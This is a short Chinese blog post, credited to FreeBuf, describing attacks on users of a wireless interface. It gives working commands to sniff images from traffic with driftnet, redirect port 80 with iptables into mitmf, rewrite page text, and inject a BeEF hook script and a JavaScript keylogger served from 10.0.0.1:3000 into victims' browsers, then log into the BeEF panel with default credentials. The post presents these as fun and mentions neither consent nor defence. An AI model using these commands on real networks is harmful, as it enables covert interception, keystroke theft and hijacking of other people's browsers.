- A+
所属分类:网络安全
图片嗅探
这是一个很好玩的功能
工具:driftnet
过程:
driftnet -i at0
然后程序会打开一个小窗口显示所有传输的图片:
单击图片保存到/
当然可以开启 Adjunct mode:
driftnet -i at0 -a
直接保存图片并显示文件名。
劫持Web流量
这个更好玩
工具:BEEF;mitmf;iptables
过程:
先把80端口的流量劫持走(这里10000是mitmf默认监听端口)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
然后打开mitmf
mitmf -i at0 --replace --search-str aaaaa --replace-str bbbbb#把所有网页中的aaaaa替换成bbbbb
上图百度了aaaaa
好吧不要恶作剧了,上干货
mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger
mitmf在这里注入了js键盘记录器
和beef的攻击测试脚本,其余的攻击方式(比如javapwn)可以参考http://www.freebuf.com/tools/45796.html
最后用BEEF测试用户浏览器吧!
/usr/share/beef-xss/beef
浏览器打开http://127.0.0.1:3000/ui/panel ,初始用户名和密码都是beef
BEEF过于高深我还没玩得很清楚请大家自行探索
(摘自freebuf。piece of the past )
http://www.freebuf.com/articles/wireless/69840.html
http://4i.ee/qNXP3
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
